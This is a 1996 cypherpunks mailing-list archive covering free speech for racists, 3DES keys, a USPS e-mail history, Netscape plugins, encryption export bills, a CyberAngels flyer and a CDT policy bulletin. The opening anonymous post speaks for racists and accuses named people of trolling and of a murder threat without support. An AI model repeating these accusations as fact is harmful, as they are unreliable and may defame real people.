nyms, rc graves is impossible to trust. Mike Beebe, Beowulf,
ezundel, nietzsche, ernstzundel and others to make transparent
trolls the ignorant anti-racist makes up.

Mike Beebe: Posted that he WILL murder David Irving, simply 
because Irving was rejected by St Martins Press because of
"controversial material."

Noticeable about capitali$t graves, he dissmisses EVERY attempt
to censor racists with a "who cares," "there just a bunch
of weinies," "if you can be heard *somewhere* without being
arrested, it's not censorship," etc.  He seems to imply that
merely because racists are powerless, we are not worthy of
protection.  I suppose if you have enough money, you can
PURCHASE your freedom, if not, tough shit.

We free-speachers don't need a character who defends the 
prosecutors when racists are sued or imprisoned in Canada,
UK, and Germany, merely for printing racist leaflets.




































































































==
sub-sub-Commandant
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Fri, 3 May 1996 07:06:44 +0800
To: cypherpunks@toad.com
Subject: Re: aufweidersehn, * grave$
Message-ID: <199605021530.IAA18089@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Some anonymous illiterate racist socialist wrote:
> Noticeable about capitali$t graves, he dissmisses EVERY attempt
> to censor racists with a "who cares," "there just a bunch
> of weinies," "if you can be heard *somewhere* without being
> arrested, it's not censorship," etc.

In defense of Rich, note that we libertarians accused 
him of being a socialist, and this anonymous socialist 
accuses him of being a capitalist.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 May 1996 03:26:34 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: [Fwd: Cylink can export 128-bit DH?]
In-Reply-To: <199605012312.QAA11109@netcom14.netcom.com>
Message-ID: <199605021252.IAA20759@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
> frantz@netcom.com (Bill Frantz) writes:
> 
>  > Most cryptographic experts recommend Triple DES, encrypting
>  > the data 3 times with 3 different keys.
> 
> It's actually encrypted three times with two keys comprising
> 112 bits of keyspace, using a decrypt on one key sandwiched
> between two encrypts using the other.  This prevents a "man
> in the middle" attack, which would be possible if only two
> DES encryptions were used, one for each key.

Many 3DES implementations actually do use 3 different
keys. Surprisingly, the strength of 3DES with 3 keys is around the
strength you would naively expect 3DES with 2 keys to have, and 3DES
with 2 keys is slightly weaker than you would expect...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 3 May 1996 04:49:24 +0800
To: cypherpunks@toad.com
Subject: [History] USPS tried to monopolize email? (c. 1981)
Message-ID: <199605021342.GAA20932@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


    Since I saw Paul Raine's presentation on proposed USPS electronic
timestamping and CA services (btw, they are also proposing to 
archive business e-correspondence for a fee), I've been trying to
recall a nasty little episode from about 15 years ago.

   Paul was adamant that the USPS would never seek a monopoly 
position on any e-service. 

   However, back in the early 80's (It had to be in the 1980-83 range, 
I suspect  1981) I clearly remember a proposal that the USPS be 
granted the monopoly status as email carrier that it then and 
still enjoys for first class mail. As I recall, the proposal would 
require email to be routed to the nearest post office to the 
destination, and there printed and delivered as paper mail.

   Needless to say, this did not happen. I am not certain, but would
not be at all surprised, if this suggestion actually emanated from the 
letter carrier's union. I remember a line from some official, along 
the lines of "We don't know exactly what this thing [email] is, but 
we own it!"

   I know that I am not hallucinating this, but the above is pretty much 
all I recall. Anyone else have more details?

Peter Trei
trei@process.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 3 May 1996 11:31:57 +0800
To: cypherpunks@toad.com
Subject: Re: [History] USPS tried to monopolize email? (c. 1981)
Message-ID: <m0uF2Ai-00094LC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:51 AM 5/2/96 -6, Peter Trei wrote:
> I've been trying to recall a nasty little episode from about 15 years ago.
>   Paul was adamant that the USPS would never seek a monopoly 
>position on any e-service. 
>
>   However, back in the early 80's (It had to be in the 1980-83 range, 
>I suspect  1981) I clearly remember a proposal that the USPS be 
>granted the monopoly status as email carrier that it then and 
>still enjoys for first class mail. As I recall, the proposal would 
>require email to be routed to the nearest post office to the 
>destination, and there printed and delivered as paper mail.
>
>   Needless to say, this did not happen. 

There was a service of this kind, that was implemented about that time frame (1982?).  Don't recall the name.  However, I don't think they got any kind of explicit monopoly.  It wasn't particularly successful, as I recall, probably because of the low penetration of computers into business during that time frame.  But it was probably intended as a way around the "chicken-and-egg" problem that you can't use email unless the the recipient does, etc.

Recall that the use of faxes "exploded" in about 1985:  Before this, faxes were rare and they were probably primarily used for inter-office communication. (If only 10% of the businesses own faxes, then only (10%x10%=1% of communications can be completed by fax;  If 90% have faxes, 90%x90%=81% can be.)  After this, and by about 1986 or so, just about every ad in industry-type magazines listed a fax number for communications. 
 We're seeing an echo of this for e-mail, 10 years later.  Within a year, it'll be rare to see an ad that _doesn't_ list an email address.  Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Fri, 3 May 1996 11:40:57 +0800
To: cypherpunks@toad.com
Subject: Unix plugins for Netscape (Was: Calling other code in Java applications and applets)
In-Reply-To: <3185E5B6.3EE8@netscape.com>
Message-ID: <4masb1$uu6@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <31887DD0.300F@netscape.com>,
Jeff Weinstein  <jsw@netscape.com> wrote:
>Ian Goldberg wrote:
>> 
>> -----BEGIN PGP SIGNED MESSAGE-----
>> 
>> In article <3187209C.3E5B@netscape.com>,
>> Jeff Weinstein  <jsw@netscape.com> wrote:
>> >
>> >  It might be interesting to make a small plugin that just does some core
>> >stuff like gathering entropy, mod-exp, and related stuff difficult or too
>> >slow in java.  I mainly brought it up because people were asking about
>> >calling native code from java.
>> >
>> In an alternate universe in which I didn't have projects to finish, I may
>> be interested in doing something like this.  However, I haven't been able
>> to find information on how to write Unix (or preferably portable) plugins.
>> 
>> Any hints?
>
>  You can get the unix plugin SDK from ftp://ftp20.netscape.com/sdk/unix/
>
I downloaded this, and I notice you don't have a "makefile.linux".  Is that
just because no one's bothered to make one, or does Linux Atlas actually
not support plugins at all?  (Quickly checking the binary...)  I see that
Linux Atlas is still a.out.  Ick.  That would make supporting plugins
pretty tough.  If it were in ELF, things would be _way_ easier; in fact,
I'd probably say trivial (but that's just me).

I'd venture a guess that most people who have a Linux box sufficiently cool
to run netscape at all, have the ability to run ELF.  In fact, there are
probably a lot of people (like everyone who bought Slackware 3.0 or a recent
RedHat) for which netscape is the _only_ a.out binary on their system.

The reason I'm pointing this out is (obviously) because Linux is my main
development platform, and I'd like to be able to try writing plugins
for things like crypto and ecash.

   - Ian "Add me to the 'Make an ELF Linux binary!!!' list..."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYj0bEZRiTErSPb1AQGWrAP/Qny7XJzKfqTj2QOQc8+QLs+utu0xA45O
+MTxJEHPmdijIxei3TGiJTJP46eYR0RJ8O+uoAB0pTE5UKnUyiwpS3eG6FUpw2FB
mQtbhGMeX1oG3v/XHG0LAPPcEf0gW/MxcSMHHKuDlSxfpn4tkSPj79XHKjYOmS4M
6nZMxi4m3us=
=U2/t
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Fri, 3 May 1996 10:57:48 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: [Fwd: Cylink can export 128-bit DH?]
In-Reply-To: <3188382C.9778B7@cs.berkeley.edu>
Message-ID: <3188F5EB.41C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


> Has this usage now changed in favor of the three key version?

I cannot speak for the general case, but in SSL 3, the 3DES_EDE_CBC
cipher uses three keys.

PK
--
Philip L. Karlton		karlton@netscape.com
Principal Curmudgeon		http://home.netscape.com/people/karlton
Netscape Communications

     They that can give up essential liberty to obtain a little
     temporary safety deserve neither liberty nor safety.
		- Benjamin Franklin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Fri, 3 May 1996 12:09:07 +0800
To: cypherpunks@toad.com
Subject: Re: [Fwd: Cylink can export 128-bit DH?]
In-Reply-To: <199605011919.MAA27020@netcom8.netcom.com>
Message-ID: <4masts$uvh@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199605011919.MAA27020@netcom8.netcom.com>,
Bill Frantz <frantz@netcom.com> wrote:
>At 12:22 AM 5/2/96 +0700, peng-chiew low wrote:
>>Daniel R. Oelke wrote:
>>> There are provisions for exporting DES for banking purposes.
>>> Generally it is a hardware card that "can't" be reused outside
>>> of the banking transfer machine. 
>>
>>So far, I've seen DES software from a couple of U.S. companies. The question
>>is "Is it the U.S. domestic DES or "export flavored" DES? As for the hardware,
>>would'nt it be inconsistant if the DES supplied is the Domestic DES?
>
>As far as I know, DES is DES, domestic or export.  If your DES
>interoperates with domestic DES (or popular implementations available on
>non-US servers), then you have DES.

Not quite.  CDMF key shortening was designed by IBM to shrink a 56-bit DES
key to 40 bits, suitable for export.  See AC2, page 366.  I heard a rumour
that CDMF is in SET, but I'm not sure how much that makes sense.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYj2w0ZRiTErSPb1AQFuSgP9EhcSgF/DVC1BFd8DPPUeD6C27HyR+Wqj
YgXXhemNgni3WGi0v7jDnhqiId0YcRpzVnlywkKvd2O6dLZVMEavL+7qytTRlo/E
iu5twOAc39JXkSj9pjpyvzChaiooujHyHKCqnCNG37Ggm4jTdHY+y59zmxy8wNka
iiXVOurajKE=
=1DPi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 3 May 1996 11:46:26 +0800
To: cypherpunks@toad.com
Subject: Re: aufweidersehn, * grave$
Message-ID: <2.2.32.19960502175519.00c9e3a0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:05 AM 5/2/96 UTC, Skipjack Sally wrote:

>Noticeable about capitali$t graves, he dissmisses EVERY attempt
>to censor racists with a "who cares," "there just a bunch
>of weinies," "if you can be heard *somewhere* without being
>arrested, it's not censorship," etc.  He seems to imply that
>merely because racists are powerless, we are not worthy of
>protection.  I suppose if you have enough money, you can
>PURCHASE your freedom, if not, tough shit.

You do not need protection against speech, you need protection against ACTS.
Speech in and of itself does not harm anyone.

>We free-speachers don't need a character who defends the 
>prosecutors when racists are sued or imprisoned in Canada,
>UK, and Germany, merely for printing racist leaflets.

You claim to believe in free speech, but only for yourself it seems.  You
seem to desire the punishment of some speech, but not others.  Who decides
in this case? You? Me? The amorphious blob known as "Government"?

I prefer the racists being able to speak in public because it gives people
the chance to counter their lies with arguments.  Truncheons just create
marters and sympathy for their cause.

Actually, I believe that the people who have been crying for the racists to
be silenced have given them more free advertising than they could possibly
get on their own.  In the black and white thinking patterns of today, and
the resistance to authority that is growing in the world, cries for
censorship make those groups more attractive to those looking for a "cause".
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 3 May 1996 10:45:42 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <m0uF2nR-00097QC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


If anybody wants to join me in expressing displeasure at being left out of the crafting of this "Burns bill" which ostensibly loosens up export controls on encryption software, here is his address.

conrad_burns@burns.senate.govJim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Fri, 3 May 1996 11:41:24 +0800
To: cypherpunks@toad.com
Subject: disclosure
Message-ID: <199605021816.LAA27417@well.com>
MIME-Version: 1.0
Content-Type: text/plain



>From cypherpunks-errors@toad.com Tue Apr 30 23:58:28 1996
>Date: Wed, 1 May 1996 00:52:03 -0500 (CDT)
>From: snow <snow@smoke.suba.com>
>To: "Perry E. Metzger" <perry@piermont.com>
>cc: "L. Detweiler" <vznuri@netcom.com>, cypherpunks@toad.com
     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
>MIME-Version: 1.0
>Content-Type: TEXT/PLAIN; charset=US-ASCII
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk

Game, set, match......





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Terry.Liberty-Parker@804.ima.infomail.com (Terry Liberty-Parker)
Date: Fri, 3 May 1996 19:22:42 +0800
Subject: Batman on the Internet??? CyberAngels info
Message-ID: <0ef_9605021349@ima.infomail.com>
MIME-Version: 1.0
Content-Type: text/plain


-=> Note:
Forwarded (from: netmail) by Terry Liberty-Parker using timEd.
Originally from Matthew Gaylor (1:382/87.0) to terry liberty-parker.
Original dated: May 01 '96, 13:50

e-Id: <v0213050eadad22805e60@[198.4.94.223]>
From: freematt@coil.com (Matthew Gaylor)

From: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)
Subject: CYBERANGELS

Thanks for your interest in our group.  We apologize for any delay in
answering your enquiry.  Our service is not automated, and we have a huge
quantity of enquiries to deal with.  Briefing papers about our work are
still in preparation.  Keep in touch with us till then.  If you have any
personal problems on the Internet, or if you find an interesting and
relevant website, then write and tell us.  We will shortly be opening a new
WWW site, and we will send a release when that is ready.  Till then, take
care, and keep your eyes open while you are cruising!  Let us know if you
find any material or activity that you think should be investigated!  Let
us know also if you find any interesting websites that share our mission!
You are now on our rmailing list!  Stand by for regular information and
alerts for CyberAngels missions.

Gabriel

**************************************************************

THE INTERNET IS OUR NEIGHBORHOOD - LET'S LOOK AFTER IT!

CYBERANGELS - WHO ARE WE?

We are an all-volunteer Internet safety patrol and monitoring project
started  in June 1995 by senior members of the world famous crime
prevention organization The International Alliance of Guardian Angels.

CyberAngels membership currently numbers more than 1000 users worldwide
in15 countries, who share a common mission - to be a Cyberspace
Neighborhood Watch and to fight Internet crime.  Our numbers are growing
daily.

We are working to make the Internet a safer and more enjoyable place to
work and play, by being role models for self-regulation and responsibility.

We are dedicated:

TO FIGHT CRIME ON THE INTERNET
 in particular criminal activity where there are clear personal victims
and/or at-risk users.

TO PROTECT OUR CHILDREN FROM ONLINE CRIMINAL ABUSE
by fighting against the trade in child pornography and by working to deter
sexual predators online.

TO GIVE SUPPORT, ADVICE AND ASSISTANCE TO INTERNET VICTIMS OF HATE MAIL,
HARASSMENT AND SEXUAL ABUSE ONLINE
by referring them to professional assistance and by helping to guide them
through the compaints and reporting processes.

TO PROMOTE, PRESERVE AND PROTECT NETIQUETTE
 that is, the rules of polite conduct  that govern our use of the Internet.
We believe in courtesy and respect for others.  We support Internet
Service Providers who have clearly defined Terms of Service for the User,
and who are prepared to enforce it.

TO HELP TO PRESERVE INTERNET FREEDOM OF SPEECH
by showing Governments that the Internet Community is prepared to take both
responsibililty and actions to preserve the personal safety of all its
members, and particularly its children.

HOW DO WE FIGHT CRIME ON THE INTERNET?

Crime on the Internet is a tiny percentage of everything that is there.
But it is real and it is claiming victims with increasing regularity.  We
believe that we the Net Community should take the responsibility for the
problem - after all it is our fellow users who are the criminals - and also
that we should assume the responsibility for crime prevention measures.
CyberAngels don't just talk about it.  WE ACT.

EDUCATION / ADVICE / CYBERSTREETSMARTS

The Internet to us is like a vast city: public and private areas, kids and
adult areas, safe areas and crime areas.  To travel it safely you need some
CyberStreetsmarts.  One of our main methods of crime prevention on the Net
is by educating users about the possible problems they may encounter, and
how to avoid them

Education means educating parents realistically about the Internet so that
they areaware of the dangers, but are not overreacting.  It's important
that parents and kids cooperate in this area.  The Internet is such a
wonderful learning environment that we wish to encourage kids to use it -
but adults must take responsibility for making sure our kids do not wander
into areas that are not appropriate.

We act as an advisory service for any user with problems of personal safety
and / or personal security on the Net.  This advice ranges from how to deal
with mailbombs, forged email, mailing list spams, virii,  impersonation and
other electronic sabotage and harassment methods,  to information about how
to deal with hate mail, sexual harassment, kids'  safety online and
unsolicited email.  Many users do not know how to report abuse nor to whom
they should report it.  CyberAngels can usually help.

SAFETY PATROLS

CyberAngels volunteers run regular Safety Patrols on the Net. Safety
Patrols on the Internet means cruising the electronic highways, keeping
your eyes open for problems.  The main areas we patrol are the Usenet
(Newsgroups) and the live channels (IRC / Chat rooms etc).

We read Newsgroups, especially the binaries groups on the Usenet, and if we
find images of child pornography posted up there we refer those files to
federal law enforcement authorities, eg US Customs Service.

We also check out fraud schemes on the Usenet, and if necessary report them
to the National Fraud Centre.  We also keep track of Spam developments -
who is mass mailing unsolicited mail and what they are offering.

We travel the live channels of IRC / MUDS or the chat rooms in the big
Providers, looking out for sexual predators searching for children, or
pedophiles trading child pornography in the live talk areas. This is a
major source of child pornography on the Net.  If we find it we report it
to Sysadmins and Federal authorities.

We cruise the World Wide Web, checking sites to make sure child pornography
is not being used to attract visitors, and checking that a site that says
it is Kidsafe really is suitable for children.  We visit and read websites
and FTP sites of Racist and other Hate Organizations, keeping a check on
their activities.  There is a very close relationship between Racist
material and Racist activities (eg Hate mail and harassment, violent
threats and intimidation).

We don't believe in the philosophy that "anything goes" on the Net. The
Internet is a society and in societies where "anything goes" then crime and
violence dominate, and the stronger consume the weaker.  The Internet is a
newly developing global nation - and we need Cyberspace law and law
enforcement  if users rights are to be protected.  We believe in FREEDOM
AND JUSTICE UNDER LAW. And although we recognize the problems of how
National Laws can be applied to an International society, we believe that
the first step is that Netizens CARE about Cybercrime and the victims of
Cybercrime.

YOU CAN HELP US!

WE NEED VOLUNTEERS!

The Internet Community is huge - a worldwide network of around 40 million
people, 11 million Websites, 3500 Service Providers - and it's growing
every day.    The more volunteers we have, the more effective we can be.
And by giving a little of your time to looking after the welfare of the
Net, you can make a real difference!

Anyone can be a CyberAngel.  The only requirement is that you commit a
minimum of 2 hours per week to the project.  No previous experience or
special skills are necessary, .although a computer and an Internet account
would be useful! :)  Being a CyberAngel  involves no risk or danger.  You
are volunteering only to be eyes watching the Net, looking out for the
welfare of others.

CAN YOU HELP US?

You may be able to help us in other ways - we are a Division of Guardian
Angels and we are a 501 (C)(3) Non-profit organization.  Our membership is
voluntary and we are in desperate need of more resources.  All of your
donations are tax-deductible.  You can help us by donating money,
computers, Internet access accounts, design skills, or websites.  Alternatively
you may like to consider sponsoring our work on the Internet.  Contact us
for details.

* Cyberangels support SAFESURF in their campaign for child safe areas on the
Net
* Cyberangels support WEBSAFE and their work with kids, teens and parents.
* Cyberangels support the BLUE RIBBON Freedom of Speech campaign
* Cyberangels support PICS, other rating systems and screening software
*Cyberangels support CYBERSPACE LAW AND LAW ENFORCEMENT.

CYBERSPACE NEEDS CYBERANGELS!


*********************************************************
Colin Gabriel Hatcher - CyberAngels Director
angels@wavenet.com

"Freedom and justice, under law"

*********************************************************


****************************************************************************
Subscribe to Freematt's Alerts: Pro-Individual Rights Issues
Send a blank message to: freematt@coil.com with the words subscribe FA
on the subject line. List is private and moderated (7-20 messages per week)
Matthew Gaylor,1933 E. Dublin-Granville Rd.,#176, Columbus, OH  43229
****************************************************************************



___
--
|Fidonet:  Terry Liberty-Parker 1:382/804
|Internet: Terry.Liberty-Parker@804.ima.infomail.com
|
| Standard disclaimer: The views of this user are strictly their own.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Fri, 3 May 1996 12:38:29 +0800
To: cypherpunks@toad.com
Subject: Re: Sun's Wallet
In-Reply-To: <199605012116.OAA09307@jobe.shell.portal.com>
Message-ID: <m2d94nhray.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


> Sydney, Australia, April 30 -- SunSoft will shortly
> release a workable cash-on-the-Internet program called
> Wallet

> Once issued, the Digital ID can
> be used within any enabled application such as Netscape
> Navigator Internet client software and Netscape
> SuiteSpot.

Will it be supported by ApacheSSL?
-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Fri, 3 May 1996 11:54:41 +0800
To: cypherpunks@toad.com
Subject: Re: Freedom and security
In-Reply-To: <v01540b00adadadb5278f@[206.86.1.35]>
Message-ID: <m2afzqj4hm.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Steven" == Steven Weller <stevenw@best.com> writes:

>>> >Jim Ray wrote
>>> 
>>> I haven't bothered reading this particular thread up until now, but in my
>>> opinion, based on this drivel, you're getting dangerously close to being
>>> certified officially by the Cabal as an ignorant kook.
>>> 
>>> >Nor does freedom increase through less laws or no laws.
>>> 
>>> Of course it does. However, to maintain community resposibility must also
>>> increase.
>> 
>> 
>> Watch your attributation, Jim Ray did not write this.

Steven> You're right. I didn't think he did when I wrote my reply. And
Steven> I don't now.  It was a case of hasty editing without
Steven> rereading. Apologies to Jim Ray.

Steven> Should have been:

Steven> Colin Gabriel Hatcher - CyberAngels Director, net kook.

Gabriel, were you watching this closely?  This is a great working
example of all the policing the Internet needs.

You didn't mention the spread of misinformation[*] as one of the
NetCrimes you were looking out for, but it is a far worse ``offense''
than anything you pointed out earlier (mailbombing, forging etc. are
defeated by proper security and administrative procedures).

[*] Misinformation in the sense that it is patently wrong, with the
facts readily available to anyone with half a clue (this is not meant
as a slur towards Steven Weller, he apologized and corrected himself),
and not propaganda.  Much like the Good Times Virus warning.
Propaganda is free speech, which must be defeated by more free speech
if it is to be defeated.
-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (Bob Palacios)
Date: Fri, 3 May 1996 11:59:00 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.15 - Legislation Challenges Clinton's Grip on US Crypto Policy
Message-ID: <v02140b04adae8d8a2723@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
   _____ _____ _______
  / ____|  __ \__   __|   ____        ___               ____             __
 | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
 | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
 | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
  \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
  The Center for Democracy and Technology  /____/     Volume 2, Number 15
----------------------------------------------------------------------------
     A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 15                           May 2, 1996

 CONTENTS: (1) New Bill Challenges Clinton's Iron Grip on US Encryption Policy
               * Senators Go Online To Discuss Bill, Seek Input from Netizens
               * Broad Public Interest/Industry Coalition Announces Support for
                 Encryption Export Relief, Announces Public Education Campaign
           (2) Background on the Encryption Policy Debate
               * Why should Internet Users Care About this Issue?
               * Pointers to More Information on the Encryption Policy Debate
           (3) Subscription Information
           (4) About CDT, contacting us

  ** This document may be redistributed freely with this banner in tact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
-----------------------------------------------------------------------------
(1) NEW EXPORT CONTROL REPEAL BILL CHALLENGES CLINTON ADMINISTRATION'S GRIP ON
    US ENCRYPTION POLICY

In a move to replace the Cold War-era regulations on encryption with
policies that make sense for the global Internet, Senators Burns (R-MT),
Dole (R-KS), Leahy (D-VT), Pressler (R-SD), Wyden (D-OR), and others today
introduced legislation to roll back the restrictions prohibiting the export
of strong encryption technology.  This historic legislation promises to
inject the debate over privacy and security on the Internet into the 1996
presidential campaign.

The bill, entitled the "Promotion of Commerce On-Line in the Digital Era
(Pro-CODE) Act of 1996", is designed to encourage the widespread
availability of strong, easy-to-use privacy and security technologies for
the Internet. It is similar to a bill introduced in March by Senators Leahy
and Burns, though the new bill does not contain criminal provisions or
provisions imposing liability for third party key holders.

Over 25 public interest organizations, and computer and communications
companies, including Microsoft, Netscape, America Online, EFF, VTW, and
Americans for Tax Reform, expressed support for this effort in a letter
sent today to the sponsors of the bill.  A list of signatories and excerpts
of the letter are included below.

Among other things, the "Pro-CODE" would:

* Allow the export of "generally available" or "public domain"
  encryption software such as PGP and popular World Wide Web browsers
  without requiring NSA authority.

* Allow the export of encryption hardware and software not available in
  the "mass market" or "public domain" under an export scheme that would
  allow up to roughly DES-strength (i.e., 56 bit key-length) security.
  if a product of similar strength is commercially available from a
  foreign supplier

* Prohibit the government from imposing mandatory key-escrow encryption
  schemes domestically, or from restricting the sale of commercial
  encryption products within the United States

* Prohibit the Department of Commerce from imposing government designed
  standards for encryption technologies (such as Clipper and Clipper
  II).

For more information, including the text of the bill, analysis, and
relevant background materials, visit CDT's Cryptography Policy Issues Page
at (http://www.cdt.org/crypto/).

CDT commends Senators Burns, Dole, Leahy, Wyden, Pressler, and the other
sponsors of this proposal for their efforts to bring strong privacy and
security technologies into the hands of Internet users, and for creating an
opportunity for a national debate on the need to reform US policy towards
encryption. We look forward to working with these and other members of
Congress, the computer and communications industry, public interest groups,
and the Internet Community as the bill makes its way through Congress.

------------------------------------------------------------------------------
* SENATORS TO GO ONLINE TO DISCUSS BILLS, TAKE COMMENTS FROM NETIZENS

In an effort to bring the Internet Community into the debate and encourage
members of Congress to work with the Net.community on vital Internet policy
issues, Senator Burns and Senator Leahy will participate in live, online
discussions of the new legislation. CDT and VTW, who are helping to
coordinate these events, will publish the transcripts of the sessions and
encourage Netizens to participate.

Please join Senator Burns live online to discuss the Pro-CODE bill on:

* MONDAY, MAY 6 AT 9:00 PM ET IN AMERICA ONLINE'S NEWS ROOM AUDITORIUM

  Note that you will have to join AOL participate in this chat. (If you
  aren't currently an AOL member, you can obtain the software by either
  a) finding one of those pervasive free floppy disks, or b) by using
  ftp to get it from ftp.aol.com (ftp://www.aol.com/)

* MONDAY, MAY 13 AT 9:00 ET AT HotWired's CLUB WIRED

  Visit http://www.hotwired.com/ for more information.

Senator Leahy will also conduct sessions on America Online and HotWired in
the next several weeks, dates and times are TBA (visit
http://www.crypto.com for updates)

-----------------------------------------------------------------------------
* BROAD COALITION OF BUSINESSES, PUBLIC INTEREST GROUPS ANNOUNCE SUPPORT FOR
  ENCRYPTION EXPORT RELIEF, LAUNCH PUBLIC EDUCATION EFFORT

In a letter sent to Senators Burns (R-MT), Dole (R-KS), Leahy (D-VT),
Pressler (R-SD) Wyden (D-OR), Murray (D-WA) and the other sponsors of the
Pro-CODE proposal, a broad coalition of computer and communications
companies, public interest and privacy organizations across the political
spectrum announced support for legislative efforts to relax encryption
export controls as well as plans to conduct a broad effort to raise public
awareness on the need to reform encryption policy.

The letter states, "Current U.S. Export controls and other regulations on
encryption technologies are stifling electronic commerce on the Internet,
handicapping U.S. industry in the global marketplace, and preventing
computer users from protecting their privacy online."

The full text of the letter is available at CDT's Crypto issues web page
(http://www.cdt.org/crypto/).

Some of the 25 groups joining the effort include the American Bankers
Association, Americans for Tax Reform, America Online, Bellcore, Business
Software Alliance, CDT, Compuserve, EFF, the Institute for Justice, Lotus,
The Media Institute, Microsoft, Netscape, Novell, Oracle Corp., Pacific
Telesis, People for the American Way, Prodigy, Securities Industry
Association, Software Publishers Association, Sybase, the Telecommincations
Industry Association, the Voters Telecommunications Watch (VTW), and
others.

The groups also announced a large-scale public education campaign designed
to raise public awareness of the importance of encryption to US
competitiveness and individual privacy, including an "encryption education
day" to be held in California's Silicon Valley in early July. The event
will bring together industry leaders, members of Congress, encryption
experts, and others to discuss the need to reform US encryption policy.
Similar events, to be held throughout the US and on the Net, are also being
planned.

-------------------------------------------------------------------------------
(2) BACKGROUND ON THE ENCRYPTION POLICY DEBATE

* Why is this issue important to Internet users?

Encryption technologies are the locks and keys of the Information age.
Encryption technology allows vital personal and commercial communications
to travel securely over insecure and inexpensive communications networks
like the Internet.

For far too long, the debate over US encryption policy has been dominated
by the NSA, FBI, and Clinton Administration, who continue to insist that
privacy, security, and the competitive advantage of the US computer and
communications industry must take a back seat to national security and law
enforcement interests.

While encryption products like PGP do allow the most computer-savvy among
us to communicate securely, there are few strong, widely available,
easy-to-use encryption applications available to Internet users.  This is
due in part to the Federal regulations which prohibit the export of strong
encryption.  As a result of these laws, US companies tend to build only one
version of an encryption product, with relatively weak encryption, in order
to sell to the global market.  This results in the limited availability of
strong encryption for domestic Internet users.

Worse, the Clinton Administration has attempted to leverage the desire of
US companies to sell strong encryption overseas to include features in
products that will allow the Federal Government easy access to the plain
text of encrypted communications.  The Administration has used the
